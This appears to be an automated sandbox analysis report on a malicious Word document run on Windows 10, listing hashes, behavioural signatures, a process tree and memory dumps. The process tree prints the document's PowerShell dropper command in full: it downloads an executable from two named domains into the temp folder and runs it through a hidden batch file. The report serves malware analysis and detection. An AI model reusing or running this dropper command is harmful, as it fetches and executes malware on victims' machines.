Analysis
-
max time kernel
138s -
max time network
181s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 09:30
Behavioral task
behavioral1
Sample
3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
Resource
win10v2004-20220812-en
General
-
Target
3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
-
Size
78KB
-
MD5
8d2ff5302b1a00e27fc74a4a0e7d691e
-
SHA1
c31d9dabf66ca0bcf3d18e530bd8c659451f6867
-
SHA256
3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73
-
SHA512
3021215fea7224c5fe15a7838c9353c6745bc3f0729ff8df46b77d9aa7a002214280a6056ce6bf43a0248d0bbda5a1d7a3c54e4b38ace76b52161a09ae94262f
-
SSDEEP
1536:fvCIgb6Evkehxknn1N9AQTZZNcXlCqe8K6NV:fvCI87vhyn1NnTZZNmCqTN
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4520 1676 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 63 3884 powershell.exe 65 3884 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1676 WINWORD.EXE 1676 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2088 powershell.exe 2088 powershell.exe 3884 powershell.exe 3884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 3884 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 1676 WINWORD.EXE 1676 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE 1676 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.execmd.exedescription pid process target process PID 1676 wrote to memory of 2860 1676 WINWORD.EXE splwow64.exe PID 1676 wrote to memory of 2860 1676 WINWORD.EXE splwow64.exe PID 1676 wrote to memory of 4520 1676 WINWORD.EXE cmd.exe PID 1676 wrote to memory of 4520 1676 WINWORD.EXE cmd.exe PID 4520 wrote to memory of 2088 4520 cmd.exe powershell.exe PID 4520 wrote to memory of 2088 4520 cmd.exe powershell.exe PID 2088 wrote to memory of 4552 2088 powershell.exe cmd.exe PID 2088 wrote to memory of 4552 2088 powershell.exe cmd.exe PID 4552 wrote to memory of 3884 4552 cmd.exe powershell.exe PID 4552 wrote to memory of 3884 4552 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''%tmp%\bdvtso.exe'');start-process ''%tmp%\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\dmmawike.bat; start-process '%tmp%\dmmawike.bat' -windowstyle hidden"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'');start-process ''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath C:\Users\Admin\AppData\Local\Temp\dmmawike.bat; start-process 'C:\Users\Admin\AppData\Local\Temp\dmmawike.bat' -windowstyle hidden"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmmawike.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe');start-process 'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe';}try{tvcv('http://electrofluxequipmentspvtltd.com/pl.bin')}catch{tvcv('http://goloramltd.com/pl.bin')}5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD570595b5937369a2592a524db67e208d3
SHA1d989b934d9388104189f365694e794835aa6f52f
SHA256be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5
-
C:\Users\Admin\AppData\Local\Temp\dmmawike.batFilesize
316B
MD564c3347fc92ba1c4dc7deb5e71e6ef03
SHA1a3f5dc5f745fc7e29fc623c9f462a4521acbc7c6
SHA256a5d9b37253770a17e6864658da3c982bc70e0fab7490bc89a1d66fc5e698701c
SHA51299b9f821be7ac6890cfd8077c32d17887cda60ef0a92bbe65045c0281474f5047838d323a9f9ab4cf1e1496e868c9ae04a2108aa55cc7714f8d328a2af1e9bca
-
memory/1676-153-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-155-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-137-0x00007FFA7F4B0000-0x00007FFA7F4C0000-memory.dmpFilesize
64KB
-
memory/1676-138-0x00007FFA7F4B0000-0x00007FFA7F4C0000-memory.dmpFilesize
64KB
-
memory/1676-152-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-141-0x00000289D32D0000-0x00000289D32D4000-memory.dmpFilesize
16KB
-
memory/1676-132-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-133-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-134-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-136-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-135-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/1676-154-0x00007FFA81510000-0x00007FFA81520000-memory.dmpFilesize
64KB
-
memory/2088-146-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmpFilesize
10.8MB
-
memory/2088-143-0x000001537A3F0000-0x000001537A412000-memory.dmpFilesize
136KB
-
memory/2088-142-0x0000000000000000-mapping.dmp
-
memory/2088-156-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmpFilesize
10.8MB
-
memory/2860-139-0x0000000000000000-mapping.dmp
-
memory/3884-151-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmpFilesize
10.8MB
-
memory/3884-147-0x0000000000000000-mapping.dmp
-
memory/3884-157-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmpFilesize
10.8MB
-
memory/3884-158-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmpFilesize
10.8MB
-
memory/4520-140-0x0000000000000000-mapping.dmp
-
memory/4552-144-0x0000000000000000-mapping.dmp